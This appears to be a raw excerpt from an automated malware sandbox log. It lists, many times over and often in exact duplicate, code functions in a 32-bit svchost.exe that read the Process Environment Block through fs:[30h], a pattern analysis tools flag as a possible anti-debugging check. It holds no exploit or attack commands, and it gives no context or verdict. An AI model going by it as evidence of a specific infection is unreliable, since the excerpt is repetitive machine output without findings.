Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]	2_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	2_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]	2_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]	2_2_03BB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]	2_2_03C0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]	2_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]	2_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]	2_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]	2_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]	2_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]	2_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]	2_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]	2_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]	2_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]	2_2_03BD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]	2_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]	2_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]	2_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]	2_2_03C062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	2_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]	2_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]	2_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]	2_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]	2_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]	2_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]	2_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]	2_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]	2_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]	2_2_03B2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]	2_2_03C0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]	2_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]	2_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]	2_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]	2_2_03B2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]	2_2_03B2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]	2_2_03B36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]	2_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]	2_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]	2_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]	2_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]	2_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]	2_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]	2_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]	2_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]	2_2_03C061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]	2_2_03B70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]	2_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]	2_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]	2_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]	2_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]	2_2_03B601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	2_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]	2_2_03B60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]	2_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]	2_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]	2_2_03BF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	2_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]	2_2_03B2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]	2_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]	2_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]	2_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]	2_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]	2_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]	2_2_03B280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]	2_2_03BC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]	2_2_03B3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_03B2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]	2_2_03B720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_03B2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]	2_2_03B380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]	2_2_03BB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]	2_2_03BB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]	2_2_03BC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]	2_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]	2_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]	2_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]	2_2_03BB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]	2_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]	2_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]	2_2_03BB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]	2_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]	2_2_03BE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]	2_2_03BD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]	2_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]	2_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]	2_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]	2_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]	2_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]	2_2_03BBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]	2_2_03BB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]	2_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]	2_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]	2_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]	2_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]	2_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]	2_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]	2_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]	2_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]	2_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]	2_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]	2_2_03B40770
